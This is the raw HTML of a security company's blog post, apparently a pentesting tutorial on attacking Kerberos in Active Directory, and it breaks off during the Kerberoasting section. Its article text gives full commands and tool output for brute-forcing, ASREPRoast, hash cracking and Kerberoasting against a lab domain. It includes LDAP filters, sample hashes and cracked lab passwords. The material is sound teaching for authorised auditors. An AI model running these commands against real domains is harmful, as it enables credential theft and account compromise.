<!DOCTYPE html> 
<html lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover">
<link rel="preload" href="https://www.tarlogic.com/wp-content/themes/Avada-Child-Theme/assets/fonts/Helvetica.woff2" as="font" type="font/woff2" crossorigin="anonymous">
<link rel="preload" href="https://www.tarlogic.com/wp-content/themes/Avada-Child-Theme/assets/fonts/BigJohn.woff2" as="font" type="font/woff2" crossorigin="anonymous">
<link rel="preload" href="https://www.tarlogic.com/wp-content/themes/Avada-Child-Theme/assets/fonts/Helvetica-Bold.woff2" as="font" type="font/woff2" crossorigin="anonymous">
<link rel="preload" href="https://www.tarlogic.com/wp-content/themes/Avada-Child-Theme/assets/fonts/Helvetica-Light.woff2" as="font" type="font/woff2" crossorigin="anonymous">
<meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />
<link rel="alternate" hreflang="es" href="https://www.tarlogic.com/es/blog/como-atacar-kerberos/" />
<link rel="alternate" hreflang="en" href="https://www.tarlogic.com/blog/how-to-attack-kerberos/" />

<title>Kerberos (II): How to attack Kerberos?</title>
<meta name="description" content="In this article about Kerberos, the following attacks against the protocol will be explained: Kerberos brute-force, ASREPRoast, Kerberoasting, Pass the key, Pass the ticket, Silver ticket and Golden ticket." />
<link rel="canonical" href="https://www.tarlogic.com/blog/how-to-attack-kerberos/" />
<meta property="og:locale" content="en_US" />
<meta property="og:type" content="article" />
<meta property="og:title" content="Kerberos (II): How to attack Kerberos?" />
<meta property="og:description" content="In this article about Kerberos, the following attacks against the protocol will be explained: Kerberos brute-force, ASREPRoast, Kerberoasting, Pass the key, Pass the ticket, Silver ticket and Golden ticket." />
<meta property="og:url" content="https://www.tarlogic.com/blog/how-to-attack-kerberos/" />
<meta property="og:site_name" content="Tarlogic Security" />
<meta property="article:published_time" content="2019-06-04T09:26:55+00:00" />
<meta property="article:modified_time" content="2021-12-19T23:28:33+00:00" />
<meta property="og:image" content="https://www.tarlogic.com/wp-content/uploads/2019/06/kerberosII.png" />
<meta property="og:image:width" content="371" />
<meta property="og:image:height" content="219" />
<meta name="twitter:label1" content="Written by" />
<meta name="twitter:data1" content="Eloy Pérez" />
<meta name="twitter:label2" content="Est. reading time" />
<meta name="twitter:data2" content="30 minutes" />

<link rel='dns-prefetch' href='//s.w.org' />
<link rel='dns-prefetch' href='//www.googletagmanager.com' />
<link rel='dns-prefetch' href='//maps.googleapis.com' />
<link href='https://fonts.gstatic.com' crossorigin rel='preconnect' />
<link rel="alternate" type="application/rss+xml" title="Tarlogic Security &raquo; Feed" href="https://www.tarlogic.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Tarlogic Security &raquo; Comments Feed" href="https://www.tarlogic.com/comments/feed/" />
<link rel="shortcut icon" href="https://www.tarlogic.com/wp-content/uploads/2016/11/FAVICON-01.png" type="image/x-icon" />

<link rel="apple-touch-icon" href="https://www.tarlogic.com/wp-content/uploads/2016/11/FAVICON-01.png">

<link rel="apple-touch-icon" sizes="180x180" href="https://www.tarlogic.com/wp-content/uploads/2016/11/FAVICON-01.png">

<link rel="apple-touch-icon" sizes="152x152" href="https://www.tarlogic.com/wp-content/uploads/2016/11/FAVICON-01.png">

<link rel="apple-touch-icon" sizes="167x167" href="https://www.tarlogic.com/wp-content/uploads/2016/11/FAVICON-01.png">
<link rel="alternate" type="application/rss+xml" title="Tarlogic Security &raquo; Kerberos (II): How to attack Kerberos? Comments Feed" href="https://www.tarlogic.com/blog/how-to-attack-kerberos/feed/" />
<meta property="og:title" content="Kerberos (II): How to attack Kerberos?" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://www.tarlogic.com/blog/how-to-attack-kerberos/" />
<meta property="og:site_name" content="Tarlogic Security" />
<meta property="og:description" content="Introduction

In this article about Kerberos, a few attacks against the protocol will be shown. In order to refresh the concepts behind the following attacks, it is recommended to check the first part of this series which covers Kerberos theory.




The post is divided in one section per attack:

 	Kerberos brute-force
 	ASREPRoast
 	Kerberoasting
 	Pass the" />
<meta property="og:image" content="https://www.tarlogic.com/wp-content/uploads/2019/06/kerberosII.png" />
<link data-minify="1" rel='stylesheet' id='wpml-legacy-horizontal-list-0-css' href='https://www.tarlogic.com/wp-content/cache/min/1/wp-content/plugins/sitepress-multilingual-cms/templates/language-switchers/legacy-list-horizontal/style-e81ae42980c5ddf463df353719e9c512.css' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='tar-main-style-css' href='https://www.tarlogic.com/wp-content/cache/min/1/wp-content/themes/Avada-Child-Theme/assets/css/main-1dc9a8cdbeb8703eadcd4fb5b8b02239.css' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='tar-header-css' href='https://www.tarlogic.com/wp-content/cache/min/1/wp-content/themes/Avada-Child-Theme/assets/css/3_layouts/header-e1e4e75656cadb99a5cfbbe559e987f7.css' type='text/css' media='all' />
<style id='rocket-lazyload-inline-css' type='text/css'>
.rll-youtube-player{position:relative;padding-bottom:56.23%;height:0;overflow:hidden;max-width:100%;}.rll-youtube-player iframe{position:absolute;top:0;left:0;width:100%;height:100%;z-index:100;background:0 0}.rll-youtube-player img{bottom:0;display:block;left:0;margin:auto;max-width:100%;width:100%;position:absolute;right:0;top:0;border:none;height:auto;cursor:pointer;-webkit-transition:.4s all;-moz-transition:.4s all;transition:.4s all}.rll-youtube-player img:hover{-webkit-filter:brightness(75%)}.rll-youtube-player .play{height:72px;width:72px;left:50%;top:50%;margin-left:-36px;margin-top:-36px;position:absolute;background:url(https://www.tarlogic.com/wp-content/plugins/wp-rocket/assets/img/youtube.png) no-repeat;cursor:pointer}
</style>
<script type='text/javascript' id='global_vars-js-extra'>
/* <![CDATA[ */
var global_vars = {"lang":"en"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.tarlogic.com/wp-content/themes/Avada-Child-Theme/assets/js/global_vars.js?ver=5.8.1' id='global_vars-js'></script>
<script data-minify="1" type='text/javascript' src='https://www.tarlogic.com/wp-content/cache/min/1/wp-content/themes/Avada-Child-Theme/assets/js/load_polyfills-3825dbfb2b3135a27bc49228953ba756.js' id='load_polyfills-js'></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.tarlogic.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.tarlogic.com/wp-includes/wlwmanifest.xml" />
<link rel='shortlink' href='https://www.tarlogic.com/?p=19268' />
<style type="text/css" id="css-fb-visibility">@media screen and (max-width: 640px){body:not(.fusion-builder-ui-wireframe) .fusion-no-small-visibility{display:none !important;}body:not(.fusion-builder-ui-wireframe) .sm-text-align-center{text-align:center !important;}body:not(.fusion-builder-ui-wireframe) .sm-text-align-left{text-align:left !important;}body:not(.fusion-builder-ui-wireframe) .sm-text-align-right{text-align:right !important;}body:not(.fusion-builder-ui-wireframe) .fusion-absolute-position-small{position:absolute;top:auto;width:100%;}}@media screen and (min-width: 641px) and (max-width: 1024px){body:not(.fusion-builder-ui-wireframe) .fusion-no-medium-visibility{display:none !important;}body:not(.fusion-builder-ui-wireframe) .md-text-align-center{text-align:center !important;}body:not(.fusion-builder-ui-wireframe) .md-text-align-left{text-align:left !important;}body:not(.fusion-builder-ui-wireframe) .md-text-align-right{text-align:right !important;}body:not(.fusion-builder-ui-wireframe) .fusion-absolute-position-medium{position:absolute;top:auto;width:100%;}}@media screen and (min-width: 1025px){body:not(.fusion-builder-ui-wireframe) .fusion-no-large-visibility{display:none !important;}body:not(.fusion-builder-ui-wireframe) .lg-text-align-center{text-align:center !important;}body:not(.fusion-builder-ui-wireframe) .lg-text-align-left{text-align:left !important;}body:not(.fusion-builder-ui-wireframe) .lg-text-align-right{text-align:right !important;}body:not(.fusion-builder-ui-wireframe) .fusion-absolute-position-large{position:absolute;top:auto;width:100%;}}</style>

<script type="application/ld+json" class="saswp-schema-markup-output">
[{"@context":"https:\/\/schema.org","@graph":[{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","@id":"https:\/\/www.tarlogic.com\/#Principal 2 - EN-2","name":"Home","url":"\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","@id":"https:\/\/www.tarlogic.com\/#Principal 2 - EN-2","name":"Cybersecurity","url":"https:\/\/www.tarlogic.com\/cybersecurity\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","@id":"https:\/\/www.tarlogic.com\/#Principal 2 - EN-2","name":"BlackArrow","url":"https:\/\/www.tarlogic.com\/blackarrow\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","@id":"https:\/\/www.tarlogic.com\/#Principal 2 - EN-2","name":"Cyber Intelligence","url":"https:\/\/www.tarlogic.com\/cyber-intelligence\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","@id":"https:\/\/www.tarlogic.com\/#Principal 2 - EN-2","name":"Blog","url":"https:\/\/www.tarlogic.com\/cybersecurity-blog\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","@id":"https:\/\/www.tarlogic.com\/#Principal 2 - EN-2","name":"Cybersecurity blog","url":"https:\/\/www.tarlogic.com\/blog\/category\/cybersecurity\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","@id":"https:\/\/www.tarlogic.com\/#Principal 2 - EN-2","name":"BlackArrow blog","url":"https:\/\/www.tarlogic.com\/blog\/category\/blackarrow-blog\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","@id":"https:\/\/www.tarlogic.com\/#Principal 2 - EN-2","name":"Cyber intelligence blog","url":"https:\/\/www.tarlogic.com\/blog\/category\/cyberintelligence-blog\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","@id":"https:\/\/www.tarlogic.com\/#Principal 2 - EN-2","name":"Cyber for all blog","url":"https:\/\/www.tarlogic.com\/blog\/category\/cyber-for-all\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","@id":"https:\/\/www.tarlogic.com\/#Principal 2 - EN-2","name":"Contact","url":"https:\/\/www.tarlogic.com\/contact\/"}]},

{"@context":"https:\/\/schema.org","@type":"BreadcrumbList","@id":"https:\/\/www.tarlogic.com\/blog\/how-to-attack-kerberos\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"item":{"@id":"https:\/\/www.tarlogic.com","name":"Tarlogic Security"}},{"@type":"ListItem","position":2,"item":{"@id":"https:\/\/www.tarlogic.com\/blog\/category\/cybersecurity\/","name":"Cybersecurity blog"}},{"@type":"ListItem","position":3,"item":{"@id":"https:\/\/www.tarlogic.com\/blog\/how-to-attack-kerberos\/","name":"Kerberos (II): How to attack Kerberos?"}}]},

{"@context":"https:\/\/schema.org","@type":"Article","@id":"https:\/\/www.tarlogic.com\/blog\/how-to-attack-kerberos\/#Article","url":"https:\/\/www.tarlogic.com\/blog\/how-to-attack-kerberos\/","inLanguage":"en-US","mainEntityOfPage":"https:\/\/www.tarlogic.com\/blog\/how-to-attack-kerberos\/","headline":"Kerberos (II): How to attack Kerberos?","description":"In this article about Kerberos, the following attacks against the protocol will be explained: Kerberos brute-force, ASREPRoast, Kerberoasting, Pass the key, Pass the ticket, Silver ticket and Golden ticket.","articleBody":"      Introduction    In this article about Kerberos, a few attacks against the protocol will be shown. In order to refresh the concepts behind the following attacks, it is recommended to check the first part of this series which covers Kerberos theory.          The post is divided in one section per attack:     \tKerberos brute-force   \tASREPRoast   \tKerberoasting   \tPass the key   \tPass the ticket   \tSilver ticket   \tGolden ticket        These attacks are sorted by the privileges needed to perform them, in ascending order. Thus, to perform the first attacks only connectivity with the DC (Domain Controller) is required, which is the KDC (Key Distribution Center) for the AD (Active Directory) network. Whereas, the last attack requires a user being a Domain Administrator or having similar privileges.          Furthermore, each attack will be introduced from the pentesting perspective of 2 common scenarios:         \tLinux machine: A computer external to the domain, owned by the auditor (Kali in this case), but with network connectivity to the DC (directly, VPN, Socks, does not really matter). It must be taken into account that the local time of the machine has to be synchronized with the DC.   \tWindows machine: A compromised Windows machine in the domain, with a domain account if needed but with no administrator privileges, neither local nor domain.    It is done this way because there are plenty of publications only covering part of one scenario. Therefore, the goal here is to present a useful guide that shows how to perform any attack in many different circumstances. Anyway, a comment can be leaving by anyone if any concept is not completely explained.              Tools  First of all, throughout this article the following main tools are used:     \tExamples of Impacket, to perform Kerberos related Linux attacks, which requires python installed on the machine.   \tMimikatz, for Windows attacks.   \tRubeus, for Windows attacks, which requires Redistributable 3.5 installed on the machine.   \tPsExec, for executing commands from Windows in remote machines.    There are a few additional tools, but those will be introduced in their respective sections. Besides, a Kerberos attacks cheatsheet was created to quickly get the commands needed to perform any of these attacks.    Let's go with the interesting stuff.      Kerberos brute-force  In first place, due to Kerberos is an authentication protocol, it is possible to perform brute-force attacks against it. Moreover, brute-forcing Kerberos has many advantages over brute-forcing other authentication methods, like the following:     \tNo domain account is needed to conduct the attack, just connectivity to the KDC.   \tKerberos pre-authentication errors are not logged in Active Directory with a normal Logon failure event (4625), but rather with specific logs to Kerberos pre-authentication failure (4771).   \tKerberos indicates, even if the password is wrong, whether the username is correct or not. This is a huge advantage in case of performing this sort of technique without knowing any username.   \tIn Kerberos brute-forcing it is also possible to discover user accounts without pre-authentication required, which can be useful to perform an ASREPRoast attack.    However, by carrying out a brute-force attack it is also possible to block user accounts. Thus, this technique should be used carefully.    From Linux  The script kerbrute.py can be used to perform a brute-force attack by using Kerberos from a Linux computer:  root@kali:kerbrute# python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt  Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation   Valid user &gt; triceratops   Valid user &gt; velociraptor    Valid user &gt; trex   Blocked\/Disabled user &gt; trex   Stupendous &gt; velociraptor:Sm4rtSp33d   Saved TGT in velociraptor.ccache   Saved discovered passwords in jurassic_passwords.txt    Once finished, a file with the discovered passwords is generated. Besides, the obtained TGTs tickets are stored for future use.  From Windows  In the case of Windows, the module brute of Rubeus, which is available on a fork of Zer1t0, can be used to launch a brute-force attack like the following:  PS C:\\Users\\user01&gt; .\\Rubeus.exe brute \/users:users.txt \/passwords:passwords.txt \/domain:jurassic.park \/outfile:jurassic_passwords.txt       ______        _    (_____ \\      | |     _____) )_   _| |__  _____ _   _  ___    |  __  \/| | | |  _ \\| ___ | | | |\/___)    | |  \\ \\| |_| | |_) ) ____| |_| |___ |    |_|   |_|____\/|____\/|_____)____\/(___\/      v1.4.2     Valid user &gt; velociraptor   Valid user &gt; trex   Valid user &gt; triceratops   STUPENDOUS &gt; triceratops:Sh4rpH0rns   Saved TGT into triceratops.kirbi    In the same way as in the Linux scenario, the discovered credentials are saved in the output file alongside valid TGTs.      ASREPRoast  The ASREPRoast attack looks for users without Kerberos pre-authentication required. That means that anyone can send an AS_REQ request to the KDC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline. More detail in Kerberos theory.    Furthermore, no domain account is needed to perform this attack, only connection to the KDC. However, with a domain account, an LDAP query can be used to retrieve users without Kerberos pre-authentication in the domain. Otherwise usernames have to be guessed.    In order to retrieve user accounts without Kerberos pre-authentication, the following LDAP filter can be used:\u00a0(&amp;(samAccountType805306368)(userAccountControl:1.2.840.113556.1.4.803:4194304)) . Parameter samAccountType\u00a0allows to request user accounts only, without including computer accounts, and\u00a0userAccountControl\u00a0filters by Kerberos pre-authentication in this case.  From Linux  The script GetNPUsers.py can be used from a Linux machine in order to harvest the non-preauth AS_REP responses. The following commands allow to use a given username list or query to obtain a list of users by providing domain credentials:  root@kali:impacket-examples# python GetNPUsers.py jurassic.park\/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast  Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation     User trex doesn't have UF_DONT_REQUIRE_PREAUTH set   User triceratops doesn't have UF_DONT_REQUIRE_PREAUTH set   Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)  root@kali:impacket-examples# cat hashes.asreproast   $krb5asrep$23$velociraptor@JURASSIC.PARK:7c2e70d3d46b4794b9549bba5c6b728e$599da4e9b7823dbc8432c188c0cf14151df3530601ad57ee0bc2730e0f10d3f1552b3552cee9431cf3f1b119d099d3cead7ea38bc29d5d83074035a2e1d7de5fa17c9925c75aac2717f49baae54958ec289301a1c23ca2ec1c5b5be4a495215d42e9cbb2feb8b7f58fb28151ac6ecb0684c27f14ecc35835aecc3eec1ec3056d831dd518f35103fd970f6d082da0ebaf51775afa8777f783898a1fa2cea7493767024ab3688ec4fe00e3d08a7fb20a32c2abf8bdf66c9c42f49576ae9671400be01b6156b4677be4c79d807ba61f4703d9acda0e66befc5b442660ac638983680ffa3ada7eacabad0841c9aee586    root@kali:impacket-examples# python GetNPUsers.py jurassic.park\/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast  Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation    Name          MemberOf                                       PasswordLastSet      LastLogon            UAC        ------------  ---------------------------------------------  -------------------  -------------------  --------  velociraptor  CNDomain Admins,CNUsers,DCjurassic,DCpark  2019-02-27 17:12:12  2019-03-18 11:44:04  0x410200         root@kali:impacket-examples# cat hashes.asreproast   $krb5asrep$23$velociraptor@JURASSIC.PARK:6602e01d59b4eeba815ab467194a9de4$b13a0e139b1daa46a457b3fa948c22cbbaad75a94c2b37064d757185d171c258e290210339d950b9245de6fa40a335986146a8c71c0b60f633b4c040141460a0a91737670f21caae6261ebde0151c06adceac22bfed84cb8c1f07948fb8e75b8a1d64c768c9e3f3a50d035ec03df643ea185648406b634b6fd673028e6e90ea429f57f9229b00f47f2bba2cdb7297d29b9f97a83d07c89dee7ea673340f64c443a213d5b9bbed969a68ca7a0ea41245b0fa985f64261803488b61821fbaedf43d50ea16075b2379bb354e4001d73dfd19cc8787b4bcd2bd9b542e0e2b1218ee8c16699c134ae5ec587afe0fd1880    After finishing the execution, the script will generate an output file with encoded AS_REP messages to crack using hashcat or John.  From Windows  Rubeus can be used to carry out this attack from a Windows machine. The following command will generate a file containing AS_REP messages of affected users:  C:\\Users\\triceratops&gt;.\\Rubeus.exe asreproast \/format:hashcat \/outfile:hashes.asreproast       ______        _    (_____ \\      | |     _____) )_   _| |__  _____ _   _  ___    |  __  \/| | | |  _ \\| ___ | | | |\/___)    | |  \\ \\| |_| | |_) ) ____| |_| |___ |    |_|   |_|____\/|____\/|_____)____\/(___\/      v1.3.3     Action: AS-REP roasting     Using domain controller: Lab-WDC01.jurassic.park (10.200.220.2)   Building AS-REQ (w\/o preauth) for: 'jurassic.park\\velociraptor'   Connecting to 10.200.220.2:88   Sent 170 bytes   Received 1423 bytes   AS-REQ w\/o preauth successful!   Hash written to C:\\Users\\triceratops\\hashes.asreproast     Roasted hashes written to : C:\\Users\\triceratops\\hashes.asreproast    C:\\Users\\triceratops&gt;type hashes.asreproast  $krb5asrep$23$velociraptor@jurassic.park:BBEC05D876E5133F5AB0CEDA07572FE0$4A826CD2123EBC266179A9009E867EAAC03D1C8C9880ACF76DCA4B5919F967E86DBB6CD475DA8EF5C83B1B8388D22DA005BA10D5CB4D10F3C3F44C918ACD5843660C4FF5C678E635F7751A109524D693DB29BF75A5F0995B41CD35600B969FE371F77AD13F48604DFAB87253D324E8F53C267A2299D2450245D317D319A4FD424B42F815B79E2DD16C58AB2A2C106EB6995AFF70C8E889D8F170B35E78993157B3B3D13DCCE18A720BC5810C474CBC95C07B5FFCEE5EE06442FDB6244C33EECA4BFCD4F6C051A5F00C40A837A9644ADA70A381A85089F05CFB5E5F03AB0C7525BBA6AEAF9DA3554D3D700DD54760    Once executed, Rubeus should have generated a file with one AS_REP per line. This file can be used to feed Hashcat or John.  Cracking the AS_REP  Finally, to crack the harvested AS_REP messages, Hashcat or John can be used. In this case a dictionary attack will be performed, but a variety of cracking techniques can be applied.    Hashcat command:  root@kali:impacket-examples# hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt   hashcat (v5.1.0) starting...    OpenCL Platform #1: The pocl project    * Device #1: pthread-Intel(R) Core(TM) i5-4210H CPU @ 2.90GHz, 2961\/2961 MB allocatable, 2MCU    Hashes: 1 digests; 1 unique digests, 1 unique salts  Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5\/13 rotates  Rules: 1    Applicable optimizers:  * Zero-Byte  * Not-Iterated  * Single-Hash  * Single-Salt    Minimum password length supported by kernel: 0  Maximum password length supported by kernel: 256    ATTENTION! Pure (unoptimized) OpenCL kernels selected.  This enables cracking passwords and salts &gt; length 32 but for the price of drastically reduced performance.  If you want to switch to optimized OpenCL kernels, append -O to your commandline.    Watchdog: Hardware monitoring interface not found on your system.  Watchdog: Temperature abort trigger disabled.    * Device #1: build_opts '-cl-stdCL1.2 -I OpenCL -I \/usr\/share\/hashcat\/OpenCL -D LOCAL_MEM_TYPE2 -D VENDOR_ID64 -D CUDA_ARCH0 -D AMD_ROCM0 -D VECT_SIZE4 -D DEVICE_TYPE2 -D DGST_R00 -D DGST_R11 -D DGST_R22 -D DGST_R33 -D DGST_ELEM4 -D KERN_TYPE18200 -D _unroll'  Dictionary cache hit:  * Filename..: passwords_kerb.txt  * Passwords.: 3  * Bytes.....: 25  * Keyspace..: 3    The wordlist or mask that you are using is too small.  This means that hashcat cannot use the full parallel power of your device(s).  Unless you supply more work, your cracking speed will drop.  For tips on supplying more work, see: https:\/\/hashcat.net\/faq\/morework    Approaching final keyspace - workload adjusted.      $krb5asrep$23$velociraptor@jurassic.park:bbec05d876e5133f5ab0ceda07572fe0$4a826cd2123ebc266179a9009e867eaac03d1c8c9880acf76dca4b5919f967e86dbb6cd475da8ef5c83b1b8388d22da005ba10d5cb4d10f3c3f44c918acd5843660c4ff5c678e635f7751a109524d693db29bf75a5f0995b41cd35600b969fe371f77ad13f48604dfab87253d324e8f53c267a2299d2450245d317d319a4fd424b42f815b79e2dd16c58ab2a2c106eb6995aff70c8e889d8f170b35e78993157b3b3d13dcce18a720bc5810c474cbc95c07b5ffcee5ee06442fdb6244c33eeca4bfcd4f6c051a5f00c40a837a9644ada70a381a85089f05cfb5e5f03ab0c7525bba6aeaf9da3554d3d700dd54760:Sm4rtSp33d                                                     Session..........: hashcat  Status...........: Cracked  Hash.Type........: Kerberos 5 AS-REP etype 23  Hash.Target......: $krb5asrep$23$velociraptor@jurassic.park:bbec05d876...d54760  Time.Started.....: Tue Mar  5 11:15:47 2019 (1 sec)  Time.Estimated...: Tue Mar  5 11:15:48 2019 (0 secs)  Guess.Base.......: File (passwords_kerb.txt)  Guess.Queue......: 1\/1 (100.00%)  Speed.#1.........:        4 H\/s (0.18ms) @ Accel:64 Loops:1 Thr:64 Vec:4  Recovered........: 1\/1 (100.00%) Digests, 1\/1 (100.00%) Salts  Progress.........: 3\/3 (100.00%)  Rejected.........: 0\/3 (0.00%)  Restore.Point....: 0\/3 (0.00%)  Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1  Candidates.#1....: above1 -&gt; below1    Started: Tue Mar  5 11:12:26 2019  Stopped: Tue Mar  5 11:15:48 2019    John command:  root@kali:kali# john --wordlistpasswords_kerb.txt hashes.asreproast  Using default input encoding: UTF-8  Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17\/18\/23 )  Will run 2 OpenMP threads  Press 'q' or Ctrl-C to abort, almost any other key for status  Warning: Only 1 candidates left, minimum 16 needed for performance.  Sm4rtSp33d       ($krb5asrep$velociraptor@jurassic.park)  1g 0:00:00:00 DONE (2019-03-07 17:16) 20.00g\/s 20.00p\/s 20.00c\/s 20.00C\/s Sm4rtSp33d  Use the \"--show\" option to display all of the cracked passwords reliably  Session completed    In this case, luck is on our side, and the user password was contained in the dictionary.      Kerberoasting  The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts. Thus, part of these TGS tickets is encrypted with keys derived from user passwords. As a consequence, their credentials could be cracked offline. More detail in Kerberos theory.    Therefore, to perform Kerberoasting, only a domain account that can request for TGSs is necessary, which is anyone since no special privileges are required.    In order to retrieve user accounts which have associated services, the following LDAP filter can be used: (&amp;(samAccountType805306368)(servicePrincipalName*)). Parameter samAccountType allows filtering out the computer accounts, and servicePrincipalName* filters by accounts with at least one service.  From Linux  From a Linux machine, it is possible retrieve all the TGS's by using the impacket example GetUserSPNs.py. The command required to perform the attack and save the TGS's into a file is the following:  root@kali:impacket-examples# python GetUserSPNs.py jurassic.park\/triceratops:Sh4rpH0rns -outputfile hashes.kerberoast  Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation    ServicePrincipalName  Name          MemberOf  PasswordLastSet      LastLogon             --------------------  ------------  --------  -------------------  -------------------  cloner\/labwws02       velociraptor            2019-02-27 17:12:12  2019-03-05 09:35:27         root@kali:impacket-examples# cat hashes.kerberoast   $krb5tgs$23$*velociraptor$JURASSIC.PARK$cloner\/labwws02*$b127187aceb93774a985bb1e528da85c$75cc3037a244f3422d6129bba79f79c67e79aca81b0b7dd551019424005abcfb8e232600fa968de2dcc9f10a44d13c17ac2be66bbb2640187dc174d81d9ebad0d691b36b3cbf4ca457678861748e2ab950f3066e0f50489415b934e4f6a2f2b7d8845cfd6a74279bad50da8c363174a07e51cbf39a2dd88bd74f1c839373cd9370ec1e2b7ebc5d6d05d49d34a75925d5983ab4849e211e57e93666f1fe9663b53620d2710e15f2c70837a4983db19c345b93f790244899b847d186197c37e966fc239ec750f91bd317fc2388ca421895052e2d57f742ab45c59275e95dfbb855ff11e5e893631164f6053ca0a6162c6b1be3ccdeb7fe2ce3a8634411b2b16ef03f558a5e0156bb8270ece6cf6b516af8172aa6071904d493c6fdf91738781371b68dfd9b4e1c2d6bcef3d665504194a703b08615d1b9c57ac794c37ab44dc2d57dff9677b0168aa7c078b190dddb2091ab63ca85868944cdbb4229a7a291028f193f94cb5c9a43c55b006cdd35df241b49d5464d3c05d5b7ec9eecd843335e45642892333b9760d06bc445d02558c2c30a2648a1018bc8493b8f73a6b0c07ffd052434239f0463b2344363656d6b6640efdc3e10fab04b99fc1f1487942c2b2c9ca7e89447aab3b1fb5adcb4b820d842a2ec713b788358e5c14d8ac3f0070058e6453297d4fb9538680ab152ce4ed3168cc6a58cc1c753b15d5de7fb98132ac3eec602ad611e8e03ed1c00c2bfa3b5bec1ea93f24b68b54fe48726f4e650dba34b3c4696b5f5e743cb5ace4b9b073dc718070d06e8f872abef2d4040350cd9e09091da47ab2fcef2e0d873afdcb9d7cf2236131f312d4e23004eb598efa064b871af82e618c31a2e82d28bc635ac3cbd000d725dd53217fb484178de3cd9bf4d20819c30c189ccc2ae349a333b628c6d41d01163b918def5ba089ac2cc6ff673dd64e1c2fef25fb599e009c1eca8e9e06cebc61fb0e7fc6922bc3edbdc60dd85a3f5b7412e8e46db80b55f577cc682892e66987a0e920872292a5cdd0f1a11fcc294461ccf86a53e75c9c8b0f9688919b4484986b7bcfb7612b117f98f5b0f4bf44ef0ad07245883ced1045b215a137d50a54f45a67168e6bed3dcb41f25b8ac307a4f3923d1545f0f6f1593db0a8b3032a3837b5c1715656e73c3ba0102e76dbbf47388bb5d1c334fc50598a57914a77c4c11059fe1b07b6342286ec2f6f38e7a5a946f40b7de01707f9681228904cb04434063c3dc7a6d26f301664514551ee20b69eb76d2a3f8fbc45b0d9cf9d236f8ac880c75b140dc471e6044b1c85af0e26393e057c5357f8ef223e845676e963eba6540d2cbee90cbb6d2422e9b1e34e6b2989a752c09b86d302219a45cd219f3fdf243f9b5c7002997daeff03f7cd437    Once finished, a file with a crackable TGS per line should have been generated as output. This file can be used to feed Hashcat or John in order to crack its TGS's.  From Windows  Likewise, Kerberoasting can be performed from a Windows machine with several tools such as Rubeus or Invoke-Kerberoast from Empire project. In this case, tools are launched from the context of a logged user inside a domain workstation. The commands are the following:  C:\\Users\\triceratops&gt;.\\Rubeus.exe kerberoast \/outfile:hashes.kerberoast       ______        _    (_____ \\      | |     _____) )_   _| |__  _____ _   _  ___    |  __  \/| | | |  _ \\| ___ | | | |\/___)    | |  \\ \\| |_| | |_) ) ____| |_| |___ |    |_|   |_|____\/|____\/|_____)____\/(___\/      v1.3.3     Action: Kerberoasting     SamAccountName         : velociraptor   DistinguishedName      : CNvelociraptor,OUUsuarios,DCjurassic,DCpark   ServicePrincipalName   : cloner\/labwws02   Hash written to C:\\Users\\triceratops\\hashes.kerberoast     Roasted hashes written to : C:\\Users\\triceratops\\hashes.kerberoast    C:\\Users\\triceratops&gt;type hashes.kerberoast  